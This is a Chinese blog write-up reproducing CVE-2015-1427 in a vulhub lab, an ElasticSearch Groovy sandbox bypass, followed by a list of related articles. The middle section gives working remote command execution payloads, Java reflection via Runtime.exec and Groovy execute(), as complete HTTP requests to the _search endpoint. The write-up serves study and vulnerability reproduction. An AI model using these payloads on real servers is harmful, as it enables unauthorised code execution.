ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现

最新推荐文章于 2023-09-14 07:00:00 发布
最新推荐文章于 2023-09-14 07:00:00 发布
阅读量790 收藏 2
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114022921
版权

ElasticSearch 命令执行漏洞(CVE-2015-1427)

by ADummy

0x00利用路线

​ Burpsuite抓包—>java代码放入json—>有回显命令执行

0x01漏洞介绍

​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。

​ jre版本:openjdk:8-jre

​ elasticsearch版本:v1.4.2

Groovy语言“沙盒”

ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法:

  1. 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射
  2. Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言

所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。

Java沙盒绕过法:

java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()

Goovy直接执行命令法:

def command='id';def res=command.execute().text;res

0x02漏洞复现

主页:

在这里插入图片描述

首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据:

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}

在这里插入图片描述

Goovy直接执行命令

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

在这里插入图片描述

Java沙盒绕过法:

POST /_search?pretty HTTP/1.1
Host: 192.168.68.132:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 489

{
    "size":1,
    "script_fields": {
        "test#": {  
            "script":
                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",

            "lang": "groovy"
        }
    }

}

在这里插入图片描述

0x03参考资料

https://www.cnblogs.com/qianxiao996/p/13574653.html

ADummy_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
ElasticSearch代码执行攻击 CVE-2015-1427 已亲自复现
qq_42430287的博客
12-25 598
ElasticsearchGroovy脚本引擎在1.3.8之前和1.4.3之前,允许远程攻击者绕过沙箱保护机制,通过精心编制的脚本执行任意shell命令。Elasticsearch <= 1.3.7 Elasticsearch 1.4.0 Elasticsearch 1.4.1 Elasticsearch 1.4.2受害者IP:192.168.63.129:64008 攻击者IP:192.168.63.1vulfocus下载链接 启动vulfocus 环境启动后,访问http://192.168.63.1
CVE-2015-1427
weixin_34390105的博客
01-13 514
2019独角兽企业重金招聘Python工程师标准>>> ...
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5554
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
Elasticsearch 漏洞收集总结
sojrs_sec的博客
12-31 7584
一:未授权访问获取敏感信息 /_cat/indices /_plugin/sql/ /_nodes /_search /_search?preety /_status 二:目录遍历漏洞cve-2015-3337) 安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响 /_cat/plugins:查看所有已安装的插件 一般复现...
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5465
春秋云镜CVE-2015-1427 ElasticSearch RCE
CVE-2015-1427Groovy 沙盒绕过 && 代码执行漏洞
浅笑996的博客
11-22 1891
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
春秋云镜 CVE-2015-1427
qq_22002773的博客
09-14 161
春秋云镜 CVE-2015-1427
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 499
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
CVE-2015-1427 ElasticSearchGroovy 沙盒绕过 && 代码执行漏洞
weixin_51387754的博客
11-17 2237
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
Elasticsearch Groovy 远程代码执行漏洞1
08-08
致谢首先感谢Wooyun社区lupin的对漏洞http://zone.wooyun.org/content/18894的分析漏洞利用0x1漏洞的成因是Groov
ES文件浏览器打开端口漏洞--- CVE-2019-6447:ES文件资源管理器打开端口漏洞-CVE-2019-6447
02-18
ES文件浏览器打开端口漏洞--- CVE-2019-6447:ES文件资源管理器打开端口漏洞-CVE-2019-6447
跨站脚本执行漏洞详解与防护
01-20
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
CVE-2019-0708-Poc.rar
05-23
CVE-2019-0708 POC,检测工具 C:. │ cve_2019_0708.rb │ Dockerfile │ LICENSE │ list.txt │ README.md │ screenshot.png │ 使用说明.txt │ ├─docker │ entrypoint.sh │ setup.sh │ └─rdesktop-...
毕业设计&课设&实战演练-elasticsearch java 演示系统
最新发布
01-30
1、资源内容:毕业设计&课设&实战演练--elasticsearch java 演示系统 2、适用人群:计算机,电子信息工程、数学等专业的学习者,作为python参考资料学习借鉴使用。 3、本资源作为“参考资料”如果需要实现其他功能,...
elasticsearch-8.11.0-windows-x86-64
11-27
Elasticsearch是一个分布式...您可以使用Elasticsearch对包括以下应用程序的海量数据集执行实时搜索:矢量搜索、全文搜索、日志、度量、应用程序性能监控(APM)、安全日志,目前为最新的8.11.0系统,和7.x有很大的变化
elasticsearch-analysis-ik-8.11.0
11-27
elasticsearch-8.11.0的分词器,配合es同版本使用,有粗粒度和细粒度分词
实验室:用于安全性分析的漏洞实验室
02-05
名称描述CVE-2015-5531 1.6.1之前的Elasticsearch中的目录遍历漏洞允许远程攻击者通过与快照API调用相关的未指定向量读取任意文件。 CVE-2016-1909 5.0.12之前的Fortinet FortiAnalyzer和5.2.5之前的5.2.x; 3.3.3...
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
03-07
elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值